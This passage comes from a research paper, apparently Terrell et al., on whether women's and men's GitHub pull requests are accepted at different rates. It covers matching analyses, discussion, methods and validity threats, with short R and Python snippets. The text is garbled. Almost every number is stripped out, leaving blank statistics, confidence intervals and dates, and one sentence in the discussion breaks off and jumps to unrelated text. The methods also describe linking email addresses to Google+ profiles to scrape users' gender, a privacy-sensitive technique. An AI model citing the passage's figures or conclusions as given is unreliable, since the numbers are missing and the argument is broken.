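                   merged_m, total_m - merged_m),
                 nrow = 2, byrow = TRUE,
                 dimnames = list(c("women", "men"), c("merged", "not merged")))
chisq.test(counts)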
we evaluate this hypothesis by parsing pull request descriptions and calculating the percentage of pulls that reference an issue. to eliminate projects that do not use issues or do not customarily link to them in pull requests, we analyze only pull requests in projects that have at least one linked pull request. here are the results (columns: gender, without reference, with reference, %, % confidence interval):
women , , . % [ . %, . %]
men , , , . % [ . %, . %]
these data show a statistically significant difference (χ² (df = , n = , , ) = , p < . ). contrary to the hypothesis, women are slightly less likely to submit a pull request that mentions an issue, suggesting that women's pull requests are less likely to fulfill a documented need. note that this does not imply women's pull requests are less valuable, but instead that the need they fulfill appears less likely to be recognized and documented before the pull request was created. regardless, the result suggests that women's increased success rate is not explained by making more specifically needed pull requests. are women making smaller changes? maybe women are disproportionately making small changes that are accepted at a higher rate because the changes are easier for project owners to evaluate. this is supported by prior work on pull requests suggesting that smaller changes tend to be accepted more than larger ones (gousios, pinzger & deursen, ). we evaluated the size of the contributions by analyzing lines of code, modified files, and number of commits included. the following table lists the median and mean lines of code added, removed, files changed, and commits across , , pull requests (columns: lines added, lines removed, files changed, commits):
women: median mean , . .
men: median mean , . .
t-test statistic: . . . .
df: , , , ,
p: <. . . <.
ci: [ . , . ] [ . , ] [− . , . ] [ . , . ]
the bottom of this chart includes welch's t-test statistics, comparing women's and men's metrics, including % confidence intervals for the mean difference. for three of four measures of size, women's pull requests are significantly larger than men's. one threat to this analysis is that lines added or removed may exaggerate the size of a change whenever a refactoring is performed. for instance, if a developer moves a , -line class from one folder to another, even though the change may be relatively benign, the change will show up as , lines added and , lines removed. although this threat is difficult to mitigate definitively, we can begin to address it by calculating the net change for each pull request as the number of added lines minus the number of removed lines. here is the result (net lines changed):
women: median mean
men: median mean
t-test statistic: . ; df: , ; p: <. ; ci: [ . , . ]
this difference is also statistically significant. so even in the face of refactoring, the conclusion holds: women make pull requests that add and remove more lines of code, and contain more commits. this is consistent with larger changes women make on wikipedia (antin et al., ). are women's pull requests more successful when contributing code? one potential explanation for why women get their pull requests accepted more often is that the kinds of changes they make are different.
for instance, changes to html could be more likely to be accepted than changes to c code, and if women are more likely to change html, this may explain our results. thus, if we look only at acceptance rates of pull requests that make changes to program code, women's high acceptance rates might disappear. for this, we define program code as files that have an extension that corresponds to a turing-complete programming language. we categorize pull requests as belonging to a single type of source code change when the majority of lines modified were to a corresponding file type. for example, if a pull request changes lines in .js (javascript) files and lines in .html files, we include that pull request and classify it as a .js change. figure shows the results for the most common programming language files (fig. a) and the most common non-programming language files (fig. b). each pair of bars summarizes pull requests classified as part of a programming language file extension, where the height of each bar represents the acceptance rate and each bar contains a % clopper–pearson confidence interval. an asterisk (*) next to a language indicates a statistically significant difference between men and women for that language using a chi-squared test, after a benjamini–hochberg correction (benjamini & hochberg, ) to control for false discovery. overall, we observe that women's acceptance rates are higher than men's for almost every programming language. the one exception is .m, which indicates objective-c and matlab, for which the difference is not statistically significant.
figure pull request acceptance rate by file type, for programming languages (a) and non-programming languages (b).
is a woman's pull request accepted more often because she appears to be a woman? another explanation as to why women's pull requests are accepted at a higher rate would be what mcloughlin calls type iii bias: "the singling out of women by gender with the intention to help" (mcloughlin, ). in our context, project owners may be biased towards wanting to help women who submit pull requests, especially outsiders to the project. in contrast, male outsiders without this benefit may actually experience the opposite effect, as distrust and bias can be stronger in stranger-to-stranger interactions (landy, ). thus, we expect that women who can be perceived as women are more likely to have their pull requests accepted than women whose gender cannot be easily inferred, especially when compared to male outsiders. we evaluate this hypothesis by comparing pull request acceptance rate of developers who have gender-neutral github profiles and those who have gendered github profiles. we define a gender-neutral profile as one where a gender cannot be readily inferred from their profile. figure gives an example of a gender-neutral github user, "akofink", who uses an identicon, an automatically generated graphic, and does not have a gendered name that is apparent from the login name. likewise, we define a gendered profile as one where the gender can be readily inferred from the image or the name.
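the majority rule used above to classify a pull request by file type is easy to express directly; the sketch below is a hypothetical illustration, not the authors' implementation, and takes as input the extension of each touched file and the number of lines modified in it.

# classify a pull request by the extension that accounts for most modified lines
dominant_extension <- function(extensions, lines_modified) {
  per_ext <- tapply(lines_modified, extensions, sum)   # lines per extension
  winner <- names(which.max(per_ext))
  # only classify when the winning extension holds a strict majority of lines
  if (per_ext[[winner]] > sum(lines_modified) / 2) winner else NA_character_
}

dominant_extension(c(".js", ".html"), c(30, 10))   # ".js": 30 of 40 lines
dominant_extension(c(".js", ".html"), c(10, 10))   # NA: no majority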
figure also gives an example of a gendered profile; the profile of "justinamiddleton" is gendered because it uses a login name (justin) commonly associated with men, and because the image depicts a person with masculine features (e.g., pronounced brow ridge (brown & perrett, )). clicking on a user's name in pull requests reveals their profile, which may contain more information such as a user-selected display name (like "justin middleton"). identifiable analysis to obtain a sample of gendered and gender-neutral profiles, we used a combination of automated and manual techniques. for gendered profiles, we included github users who used a profile image rather than an identicon and for whom vasilescu and colleagues' tool could confidently infer a gender from the user's name (vasilescu, capiluppi & serebrenik, ). for gender-neutral profiles, we included github users that used an identicon, that the tool could not infer a gender for, and that a mixed-culture panel of judges could not guess the gender for. while acceptance rate results so far have been robust to differences between insiders (people who are owners or collaborators of a project) versus outsiders (everyone else), for this analysis, there is a substantial difference between the two, so we treat each separately. figure shows the acceptance rates for men and women when their genders are identifiable versus when they are not, with pull requests submitted by insiders on the left and pull requests submitted by outsiders on the right.
figure pull request acceptance rate by gender and perceived gender, with % clopper–pearson confidence intervals, for insiders (a) and outsiders (b).
identifiable results for insiders, we observe little evidence of bias when we compare women with gender-neutral profiles and women with gendered profiles, since both have similar acceptance rates. this can be explained by the fact that insiders likely know each other to some degree, since they are all authorized to make changes to the project, and thus may be aware of each other's gender. for outsiders, we see evidence for gender bias: women's acceptance rates drop by . % when their gender is identifiable, compared to when it is not (χ² (df = , n = , ) = , p < . ). there is a smaller . % drop for men (χ² (df = , n = , ) = , p < . ). women have a higher acceptance rate of pull requests overall (as we reported earlier), but when they are outsiders and their gender is identifiable, they have a lower acceptance rate than men. are acceptance rates different if we control for covariates? in analyses of pull request acceptance rates up until this point, covariates other than the variable of interest (gender) may also contribute to acceptance rates. we have previously shown an imbalance in covariate distributions for men and women (e.g., number of projects contributed to and number of changes made) and this imbalance may confound the observed gender differences.
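one quick way to see this kind of covariate imbalance is to compare per-gender summaries of the covariates; the sketch below is a hypothetical illustration with placeholder file and column names, not the authors' analysis.

pulls <- read.csv("pull_requests.csv", stringsAsFactors = FALSE)

# per-gender medians of a few covariates that may differ between the groups
covariates <- c("lines_added", "files_changed", "commits", "projects_contributed")
aggregate(pulls[, covariates], by = list(gender = pulls$gender), FUN = median)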
in this section, we re-analyze acceptance rates while controlling for these potentially confounding covariates using propensity score matching, a technique that supports causal inference by transforming a dataset from a non-randomized field study into a dataset that "looks closer to one that would result from a perfectly blocked (and possibly randomized) experiment" (ho et al., ). that is, by making gender comparisons between subjects having the same propensity scores, we are able to remove the confounding effects, giving stronger evidence that any observed differences are primarily due to gender bias. while full details of the matching procedure can be found in the appendix, in short, propensity score matching works by matching data from one group to similar data in another group (in our case, men's and women's pull requests), then discarding the data that do not match. the discarded data represent outliers, and thus the results from analyzing matched data may differ substantially from the results from analyzing the original data. the advantage of propensity score matching is that it controls for any differences we observed earlier that are caused by a measured covariate, rather than gender bias. one negative side effect of matching is that statistical power is reduced because the matched data are smaller than the original dataset. we may also observe different results than in the larger analysis because we are excluding certain subjects from the population having atypical covariate value combinations that could influence the effects in the previous analyses. (for the sake of completeness, the result of that matching process is included in the supplemental files.) figure shows acceptance using matched data for all pull requests, for just pull requests from outsiders, and for just pull requests on projects that carry open source (oss) licenses. asterisks (*) indicate that each difference is statistically significant using a chi-squared test, though the magnitude of the difference between men and women is smaller than for unmatched data. figure shows acceptance rates for matched data, analogous to fig. . we calculate statistical significance with a chi-squared test, with a benjamini–hochberg correction (benjamini & hochberg, ). for programming languages, acceptance rates for three (ruby, python, and c++) are significantly higher for women, and one (php) is significantly higher for men. figure shows acceptance rates for matched data by pull request index, that is, for each user's first pull request, second and third pull request, fourth through seventh pull request, and so on. we perform chi-squared tests and benjamini–hochberg corrections here as well. compared to fig. , most differences between genders diminish to the point of non-statistical significance. from fig. , we might hypothesize that the overall difference in acceptance rates between genders is due to just the first pull request. to examine this, we separate the pull request acceptance rate into:
• one-timers: pull requests from people who only ever submit one pull request.
• regulars' first: first pull requests from people who go on to submit other pull requests.
• regulars' rest: all other (second and beyond) pull requests.
figure acceptance rates for men and women for all data, outsiders, and open source projects using matched data.
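the per-language significance testing described above pairs one chi-squared test per file type with a benjamini–hochberg correction across the whole family of tests; a minimal sketch follows, with invented counts (rows: women, men; columns: merged, not merged).

per_language <- list(
  ".rb"  = matrix(c(900, 100, 8500, 1500), nrow = 2, byrow = TRUE),
  ".py"  = matrix(c(700, 140, 9100, 1900), nrow = 2, byrow = TRUE),
  ".php" = matrix(c(300,  90, 4200, 1000), nrow = 2, byrow = TRUE)
)

p_raw <- sapply(per_language, function(tbl) chisq.test(tbl)$p.value)
p_adj <- p.adjust(p_raw, method = "BH")   # benjamini-hochberg false-discovery control
data.frame(language = names(p_raw), p_raw, p_adj, significant = p_adj < 0.05)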
figure shows the results. overall, women maintain a significantly higher acceptance rate beyond the first pull request, disconfirming the hypothesis. we next investigate acceptance rate by gender and perceived gender using matched data. here we match slightly differently, matching on identifiability (gendered, unknown, or neutral) rather than use of an identicon. unfortunately, matching on identifiability (and the same covariates described in this section) reduces the sample size of gender neutral pulls by an order of magnitude, substantially reducing statistical power. consequently, here we relax the matching criteria by broadening the equivalence classes for numeric variables. figure plots the result. for outsiders, while men and women perform similarly when their genders are neutral, when their genders are apparent, men's acceptance rate is . % higher than women's (χ² (df = , n = , ) = , p < . ). how has this matched analysis of the data changed our findings? our observation about overall acceptance rates being higher for women remains, although the difference is smaller. our observation about women's acceptance rates being higher than men's for all programming languages is now mixed; instead, women's acceptance rate is significantly higher for three languages, but significantly lower for one language. our observation that women's acceptance rates continue to outpace men's becomes less clear. finally, for outsiders, although gender-neutral women's acceptance rates no longer outpace men's to a statistically significant extent, men's pull requests continue to be accepted more often than women's when the contributor's gender is apparent.
figure acceptance rates for men and women using matched data by file type for programming languages (a) and non-programming languages (b).
discussion why do differences exist in acceptance rates? to summarize this paper's observations:
1. women are more likely to have pull requests accepted than men.
2. women continue to have high acceptance rates as they do pull requests on more projects.
3. women's pull requests are less likely to serve a documented project need.
4. women's changes are larger.
5. women's acceptance rates are higher for some programming languages.
6. men outsiders' acceptance rates are higher when they are identifiable as men.
figure pull request acceptance rate over time using matched data.
we next consider several alternative theories that may explain these observations as a whole. given observations – , one theory is that a bias against men exists, that is, a form of reverse discrimination. however, this theory runs counter to prior work (e.g., nafus, ), as well as observations . another theory is that women are taking fewer risks than men. this theory is consistent with byrnes' meta-analysis of risk-taking studies, which generally find women are more risk-averse than men (byrnes, miller & schafer, ).
however, this theory is not consistent with observation , because women tend to change more lines of code, and changing more lines of code correlates with an increased risk of introducing bugs (mockus & weiss, ). another theory is that women in open source are, on average, more competent than men. in lemkau's review of the psychology and sociology literature, she found that women in male-dominated occupations tend to be highly competent (lemkau, ). this theory is consistent with observations – . to be consistent with observations , we need to explain why women's pull request acceptance rate drops when their gender is apparent. an addition to this theory that explains observation , and the anecdote described in the introduction, is that discrimination against women does exist in open source.
figure acceptance rates for men and women broken down by category.
figure pull request acceptance rate by gender and perceived gender, using matched data.
(effect sizes below are calculated using the chies function in the compute.es r package: https://cran.r-project.org/web/packages/compute.es/compute.es.pdf.)
assuming this final theory is the best one, why might it be that women are more competent, on average? one explanation is survivorship bias: as women continue their formal and informal education in computer science, the less competent ones may change
for instance, as experience doubles from to pull requests for men, pull acceptance rate increases by . %. second, the larger a pull request is, the less likely it is to be accepted (gousios, pinzger & deursen, ). in our pull request data, for example, increasing the number of files changed from to decreases the acceptance rate by . %. using others’ data, let us compare our effect size to effect sizes reported in other studies of gender bias. davison and burke’s meta-analysis of sex discrimination found an average pearson correlation of r = . , a standardized effect size that represents the linear dependence between gender and job selection (davison & burke, ). in comparison, our . % overall acceptance rate difference is equivalent to r = . . thus, the effect we have uncovered is only about a quarter of the effect in typical studies of gender bias. conclusion in closing, as anecdotes about gender bias persist, it is imperative that we use big data to better understand the interaction between genders. while our big data study does not prove that differences between gendered interactions are caused by bias among individuals, combined with qualitative data about bias in open source (nafus, ), the results are troubling. our results show that women’s pull requests tend to be accepted more often than men’s, yet women’s acceptance rates are higher only when they are not identifiable as women. in the context of existing theories of gender in the workplace, plausible explanations include terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://cran.r-project.org/web/packages/compute.es/compute.es.pdf https://cran.r-project.org/web/packages/compute.es/compute.es.pdf https://cran.r-project.org/web/packages/compute.es/compute.es.pdf https://peerj.com http://dx.doi.org/ . /peerj-cs. the presence of gender bias in open source, survivorship and self-selection bias, and women being held to higher performance standards. while bias can be mitigated—such as through ‘‘bias busting’’ workshops (http: //www.forbes.com/sites/ellenhuet/ / / /rise-of-the-bias-busters-how-unconscious- bias-became-silicon-valleys-newest-target), open source codes of conduct (http: //contributor-covenant.org) and blinded interviewing (https://interviewing.io)— the results of this paper do not suggest which, if any, of these measures should be adopted. more simply, we hope that our results will help the community to acknowledge that biases are widespread, to reevaluate the claim that open source is a pure meritocracy, and to recognize that bias makes a practical impact on the practice of software development. acknowledgements special thanks to denae ford for her help throughout this research project. thanks to the developer liberation front for their reviews of this paper. for their helpful discussions, thanks to tiffany barnes, margaret burnett, tim chevalier, aaron clauset, julien couvreur, prem devanbu, ciera jaspan, saul jaspan, david jones, jeff leiter, ben livshits, titus von der malsburg, peter rigby, david strauss, bogdan vasilescu, and mikael vejdemo- johansson. for their helpful critiques during the peer review process, thanks to lynn conway, caroline simard, and the anonymous reviewers. appendix: materials and methods github scraping an initial analysis of ghtorrent pull requests showed that our pull request merge rate was significantly lower than that presented in prior work on pull requests (gousios, pinzger & deursen, ). 
we found a solution to the problem that calculated pull request status using a different technique, which yielded a pull request merge rate comparable to prior work. however, in a manual inspection of pull requests, we noticed that several calculated pull request statuses were different than the statuses indicated on the http://github.com website. as a consequence, we wrote a web scraping tool that automatically downloaded the pull request html pages, parsed them, and extracted data on status, pull request message, and comments on the pull request. we performed this process for all pull requests submitted by github users that we had labeled as either a man or woman. in the end, the pull request acceptance rate was . % for all processed pull requests. we determined whether a pull requestor was an insider or an outsider during our scraping process because the data was not available in the ghtorrent dataset. we classified a user as an insider when the pull request explicitly listed the person as a collaborator or owner (https://help.github.com/articles/what-are-the-different-access-permissions/#user-accounts), and classified them as an outsider otherwise. this analysis has inaccuracies because github users can change roles from outsider to insider and vice-versa. as an example, about . % of merged pull requests from both outsider female and male users were merged by the outsider pull-requestor themselves, which is not possible, since outsiders by definition do not have the authority to self-merge. we emailed such an outsider, who indicated that, indeed, she was an insider when she made that pull request. we attempted to mitigate this problem by using a technique similar to that used in prior work (gousios, pinzger & deursen, ; yu et al., ). from contributors that we initially marked as outsiders, for a given pull request on a project, we instead classified them as insiders when they met any of three conditions. the first condition was that they had closed an issue on the project within days prior to opening the given pull request. the second condition was that they had merged the given pull request or any other pull request on the project in the prior days. the third condition was that they had closed any pull request that someone else had opened in the prior days. meeting any of these conditions implies that, even if the contributor was an outsider at the time of our scraping, they were probably an insider at the time of the pull request. gender linking to evaluate gender bias on github, we first needed to determine the genders of github users. our technique uses several steps to determine the genders of github users. first, from the ghtorrent data set, we extract the email addresses of github users.
second, for each email address, we use the search engine in the google+ social network to search for users with that email address. the search works for both google users' email addresses (@gmail.com), as well as other email addresses (such as @ncsu.edu). third, we parse the returned users' 'about' page to scrape their gender. finally, we include only the genders 'male' and 'female' ( , users who make pull requests) because there were relatively few other options chosen ( users). we also automated and parallelized this process. this technique capitalizes on several properties of the google+ social network. first, if a google+ user signed up for the social network using an email address, the search results for that email address will return just that user, regardless of whether that email address is publicly listed or not. second, signing up for a google account currently requires you to specify a gender (though 'other' is an option) (https://accounts.google.com/signup), and, in our discussion, we interpret their use of 'male' and 'female' in gender identification (rather than sex) as corresponding to our use of the terms 'man' and 'woman'. third, when google+ was originally launched, gender was publicly visible by default (http://latimesblogs.latimes.com/technology/ / /google-plus-users-will-soon-be-able-to-opt-out-of-sharing-gender.html). merged pull requests throughout this study, we measure pull requests that are accepted by calculating developers' merge rates, that is, the number of pull requests merged divided by the sum of the number of pull requests merged, closed, and still open. we include pull requests still open in the denominator in this calculation because pull requests that are still open could be indicative of a pull requestor being ignored, which has the same practical impact as rejection. project licensing to determine whether a project uses an open source license, we used an experimental github api that uses heuristics to determine a project's license (https://developer.github.com/v /licenses/). we classified a project (and thus the pull request on that project) as open source if the api reported a license that the open source initiative considers in compliance with the open source definition (https://opensource.org/licenses), which were afl- . , agpl- . , apache- . , artistic- . , bsd- -clause, bsd- -clause, epl- . , eupl- . , gpl- . , gpl- . , isc, lgpl- . , lgpl- . , mit, mpl- . , ms-pl, ms-rl, ofl- . , and osl- . . projects were not considered open source if the api did not return a license for a project, or the license was bsd- -clause-clear, cc-by- . , cc-by-sa- . , cc - . , other, unlicense, or wtfpl.
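as a small worked example of the merge-rate definition in the 'merged pull requests' paragraph above, the r sketch below computes the rate for one hypothetical developer; open pull requests count against the developer because being ignored has the same practical effect as rejection.

# merge rate = merged / (merged + closed + still open)
merge_rate <- function(merged, closed, open) {
  merged / (merged + closed + open)
}

merge_rate(merged = 8, closed = 2, open = 2)   # 8 of 12 pulls accepted, ~0.67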
determining gender neutral and gendered profiles to determine gendered profiles, we first parsed github profile pages to determine whether each user was using a profile image or an identicon. of the users who performed at least one pull request, , used a profile image and , used an identicon. we then ran display names and login names through a gender inference program, which maps a name to a gender. we classified a github profile as gendered if each of the following were true: • a profile image (rather than an identicon) was used, and • the gender inference tool output a gender at the highest level of confidence (that is, ‘male’ or ‘female,’ rather than ‘mostly male,’ ‘mostly female,’ or ‘unknown’). we classified profile images as identicons using imagemagick (http://www.graphicsmagick.org/graphicsmagick.html), looking for an identicon-specific file size, image dimension, image class, and color depth. in an informal inspection into profile images, we found examples of non-photographic images that conveyed gender cues, so we did not attempt to distinguish between photographic and non-photographic images when classifying profiles as gendered. to classify profiles as gender neutral, we added a manual step. given a github profile that used an identicon (thus, a gender could not be inferred from a profile image) and a name that the gender inference tool classified as ‘unknown’, we manually verified that the profile could not be easily identified as belonging to a specific gender. we did this in two phases. in the first phase, we assembled a panel of people to evaluate profiles for s each. the panelists were a convenience sample of graduate and undergraduate students from north carolina state university. panelists were of american (man), chinese (man), and indian (woman) origin, representative of the three most common nationalities on github. we used different nationalities because we wanted the panel to be able to identify, if possible, the genders of github usernames with different cultural origins. in the second phase, we eliminated two inefficiencies from the first phase: (a) because the first panel estimated that for % of profiles, they only looked at login names and display names, we only showed this information to the second panel, and (b) because the first panel found s was usually more time than was necessary to assess gender, we allowed panelists at the second phase to assess names at their own pace. across both phases, panelists were instructed to signal if they could identify the gender of the github profile. to estimate terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/developerliberationfront/gendercomputer https://github.com/developerliberationfront/gendercomputer https://github.com/developerliberationfront/gendercomputer https://peerj.com https://developer.github.com/v /licenses/ https://developer.github.com/v /licenses/ https://opensource.org/licenses http://www.graphicsmagick.org/graphicsmagick.html http://dx.doi.org/ . /peerj-cs. panelists’ confidence, we considered using a threshold like ‘‘ % confident of the gender,’’ but found that this was too ambiguous in pilot panels. instead, we instructed panelists to signal if they would be comfortable addressing the github user as ‘mister’ or ‘miss’ in an email, given the only thing they knew about the user was their profile. 
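A minimal sketch of the gendered-profile rule described above (the complementary gender-neutral rule, which additionally involves the panel check, is defined next). The identicon heuristics shown here are placeholders rather than the exact file size, dimension, class, and color depth values we matched against.

```python
CONFIDENT_LABELS = {"male", "female"}  # 'mostly male', 'mostly female', 'unknown' do not qualify

def looks_like_identicon(image_meta):
    """Placeholder identicon check over image metadata (e.g., from an 'identify' call).
    The real check matched an identicon-specific file size, dimensions, class, and color depth."""
    return (image_meta.get("width") == image_meta.get("height")      # square image
            and image_meta.get("n_colors", 999) <= 4                 # assumed color depth
            and image_meta.get("file_size", 10**6) < 2_000)          # assumed small file size

def is_gendered_profile(image_meta, inferred_gender):
    """Gendered: a real profile image is used AND the name-based inference is high confidence."""
    return (not looks_like_identicon(image_meta)) and inferred_gender in CONFIDENT_LABELS
```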
we considered a github profile as gender neutral if all of the following conditions were met: • an identicon (rather than a profile image) was used, • the gender inference tool output a ‘unknown’ for the user’s login name and display name, and • none of the panelists indicated that they could identify the user’s gender. rather than asking a panel to laboriously evaluate every profile for which the first two criteria applied, we instead asked panelists to inspect a random subset. across both panels, panelists inspected , profiles of roughly equal numbers of women and men. we chose the number , by doing a rough statistical power analysis using the results of the first panel to determine how many profiles panelists should inspect during the second panel to obtain statistically significant results. of the , , panelists eliminated profiles for which at least one panelist could infer a gender. matching procedure to enable more confident causal inferences about the effect of gender, we used propensity score matching to remove the effect of confounding factors from our acceptance rate analyses. in our analyses, we used men as the control group and women as the treatment group. we treated each pull request as a data point. the covariates we matched were number of lines added, number of lines removed, number of commits, number of files changed, pull index (the creator’s nth pull request), number of references to issues, license (open source or not), creator type (owner, collaborator, or outsider), file extension, and whether the pull requestor used an identicon. we excluded pull requests for which we were missing data for any covariate. we used the r library matchit (ho et al., ). although matchit offers a variety of matching techniques, such as full matching and nearest neighbor, we found that only the exact matching technique completed the matching process, due to our large number of covariates and data points. with exact matching, each data point in the treatment group must match exactly with one or more data points in the control group. this presents a problem for covariates with wide distributions (such as lines of code) because it severely restricts the technique’s ability to find matches. for instance, if a woman made a pull request with lines added and a man made a pull request with lines added that was otherwise identical (same number of lines removed, same file extension, and so on), these two data points would not be matched and excluded from further analysis. consequently, we pre-processed each numerical variable into the floor of the log of it. thus, for example, both and are transformed into , and thus can be exactly matched. after exact matching, the means of all covariates are balanced, that is, their weighted means are equal across genders. raw numerical data, since we transformed it, is not terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. perfectly balanced, but is substantially more balanced than the original data; each covariate showed a % or better balance improvement. finally, as we noted in the matching procedure for gendered and gender-neutral contributors, to retain reasonable sample sizes, we relaxed the matching criteria by broadening the equivalence classes for numeric variables. specifically, for lines added, lines removed, commits, files changed, pull index, and references, we transformed the data using log rather than log . 
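Because exact matching requires identical covariate values, the floor-of-log preprocessing described above coarsens wide-ranging counts into equivalence classes. The sketch below illustrates the idea; the logarithm base is left as a parameter because the bases used in the two matching passes are not reproduced here.

```python
import math

def log_bin(x, base=2):
    """Floor of log_base(x), used to coarsen counts (lines added, commits, ...)
    into equivalence classes for exact matching. Zero gets its own bin."""
    return -1 if x <= 0 else math.floor(math.log(x, base))

# Two otherwise-identical pull requests of 90 and 100 added lines would not match
# exactly on raw counts, but fall into the same bin after the transform:
print(log_bin(90), log_bin(100))   # both 6 with base 2, since 64 <= x < 128
```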
missing data in some cases, data were missing when we scraped the web to obtain data to supplement the ghtorrent data. we describe how we dealt with these data here. first, information on file types was missing for pull requests that added or deleted more than , lines. the problem was that github does not include file type data on initial page response payloads for large changes, presumably for efficiency reasons. this missing data affects the results of the file type analysis and the propensity score matching analysis; in both cases, pull requests of over , lines added or deleted are excluded. second, when retrieving github user images, we occasionally received abnormal server response errors, typically in the form of http errors. thus, we were unable to determine if the user used a profile image or identicon in , ( . % of users and . % of pull requests). we excluded these users and pull requests when analyzing data on gendered users. third, when retrieving github pull request web pages, we occasionally received abnormal server responses as well. in these cases, we were unable to obtain data on the size of the change (lines added, files changed, etc.), the state (closed, merged, or open), the file type, or the user who merged or closed it, if any. this data comprises . % of pull requests for which we had genders of the pull request creator. these pull requests are excluded from all analyses. threats one threat to this analysis is that additional covariates, including ones that we could not collect, may influence acceptance rate. one example is that we did not account for the github user judging pull requests, even though such users are central to the pull request process. another example is pull requestors’ programming experience outside of github. two covariates we collected, but did not control for, is the project the pull request is made to and the developer deciding on the pull request. we did not control for these covariates because we reasoned that it would discard too many data points during matching. another threat to this analysis is the existence of robots that interact with pull requests. for example, ‘‘snoopy crime cop’’ (https://github.com/snoopycrimecop) appears to be a robot that has made thousands of pull requests. if such robots used an email address that linked to a google profile that listed a gender, our merge rate calculations might be skewed unduly. to check for this possibility, we examined profiles of github users that we have genders for and who have made more than , pull requests. the result was tens of github users, none of whom appeared to be a robot. so in terms of our merge calculation, we are somewhat confident that robots are not substantially influencing the results. terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/snoopycrimecop http://dx.doi.org/ . /peerj-cs. another threat is if men and women misrepresent their genders. if so, we inaccurately label some men on github as women, and vice-versa. while emailing the thousands of pull requestors described in this study to confirm their gender is feasible, doing so is ethically questionable; ghtorrent no longer includes personal email addresses, after github users complained of receiving too many emails from researchers (https: //github.com/ghtorrent/ghtorrent.org/issues/ ). another threat is github developers’ use of aliases (vasilescu et al., ); the same person may appear as multiple github users. 
each alias artificially inflates the number of developers shown in the histograms in fig. . most pull request-level analysis, which represents most of the analyses performed in this paper, are unaffected by aliases that use the same email address. another threat is inaccuracies in our assessment of whether a github member’s gender is identifiable. first, the threat in part arises from our use the gendercomputer program. when gendercomputer labels a github profile as belonging to a man, but a human would perceive the user’s profile as belonging to a woman (or vice-versa), then our classification of gendered profiles is inaccurate in such cases. we attempted to mitigate this risk by discarding any profiles in the gendered profile analysis that gendercomputer classified with low-confidence. second, the threat in part arises from our panel. for profiles we labeled as gender-neutral, our panel may not have picked out subtle gender features in github users’ profiles. moreover, project owners may have used gender signals that we did not; for example, if a pull requestor sends an email to a project owner, the owner may be able to identify the requestor’s gender even though our technique could not. a similar threat is that users who judge pull requests encounter gender cues by searching more deeply than we assume. we assume that the majority of users judging pull requests will look only at the pull request itself (containing the requestor’s username and small profile image) and perhaps the requestor’s github profile (containing username, display name, larger profile image, and github contribution history). likewise, we assume that very few users judging pull requests will look into the requestor further, such as into their social media profiles. although judges could have theoretically found requestors’ google+ profiles using their email addresses (as we did), this seems unlikely for two reasons. first, while pull requests have explicit links to a requestor’s github profile, they do not have explicit links to a requestor’s social media profile; the judge would have to instead seek them out, possibly using a difficult-to-access email address. second, we claim that our github-to-google+ linking technique is a novel research technique; assuming that it is also novel in practice, users who judge pull requests would not know about it and therefore would be unable to look up a user’s gender on their google+ profile. another threat is that of construct validity, whether we are measuring what we aim to measure. one example is our inclusion of ‘‘open’’ pull requests as a sign of rejection, in addition to the ‘‘closed’’ status. rather than a sign of rejection, open pull requests may simply have not yet been decided upon. however, these pull requests had been open for at least days, the time between when the last pull request was included in ghtorrent and when we did our web scrape. given gousios and colleagues’ ( ) finding that % of pull requests are closed within days, insiders likely had ample time to decide on open terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/ghtorrent/ghtorrent.org/issues/ https://github.com/ghtorrent/ghtorrent.org/issues/ http://dx.doi.org/ . /peerj-cs. table acceptance rates for github users not linked to google+ (top row) versus those who are linked (bottom rows), by stated gender. right three columns indicate the percentiles of the number of projects contributed to. 
gender category users pull requests acceptance rate % confidence interval user not on google+ , , , . % [ . %, . %] user identifies as ‘male’ on google+ , , , . % [ . %, . %] user identifies as ‘female’ on google+ , , . % [ . %, . %] user has no gender listed on google+ , , . % [ . %, . %] user lists ‘declined to state’ for gender on google+ , , . % [ . %, . %] user lists other gender on google+ , . % [ . %, . %] table percentiles of the number of projects contributed to for github users not linked to google+ (top row) versus those who are linked (bottom rows), by stated gender. gender category users pull requests % % % user not on google+ , , , . . . user identifies as ‘male’ on google+ , , , . . . user identifies as ‘female’ on google+ , , . . . user has no gender listed on google+ , , . . . user lists ‘declined to state’ for gender on google+ , , . . . user lists other gender on google+ , . . . pull requests. another example is whether pull requests that do not link to issues signals that the pull request does not fulfill a documented need. a final example is that a github user might be an insider without being an explicit owner or collaborator; for instance, a user may be well-known and trusted socially, yet not be granted collaborator or owner status, in an effort to maximize security by minimizing a project’s attack surface (howard, pincus & wing, ). another threat is that of external validity; do the results generalize beyond the population studied? while we chose github because it is the largest open source community, other communities such as sourceforge and bitbucket exist, along with other ways to make pull requests, such at through the git version control system directly. thus, our study provides limited generalizability to other open source ecosystems. moreover, while we studied a large population of contributors, they represent only part of the total population of developers on github, because not every developer makes their email address public, because not every email address corresponds to a google+ profile, and because not every google+ profile lists gender. to understand this threat, tables and compare github users who we could link to google+ accounts (the data we used in this paper) against those who do not have google+ accounts. the top rows are the main ones of interest. in table , we use an exclusively ghtorrent-based calculation of acceptance rate where a pull request is considered accepted if its commit appears in the commit history of the project; we use a different measure of acceptance rate here because we did not parse pull requests made by people not on google+. terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in terms of acceptance rate, users not on google+ have a lower acceptance rate than both males and females on google+. in terms of number of unique projects contributed to, users not on google+ contribute to about the same number as men on google+. a final threat to this research is our own biases as researchers, which may have influenced the results. while it is difficult to control for implicit bias, we can explicitly state what our biases are, and the reader can interpret the findings in that context. first, prior to conducting this research, all researchers on the team did believe that gender bias exists in open source communities, based on personal experience, news articles, and published research. 
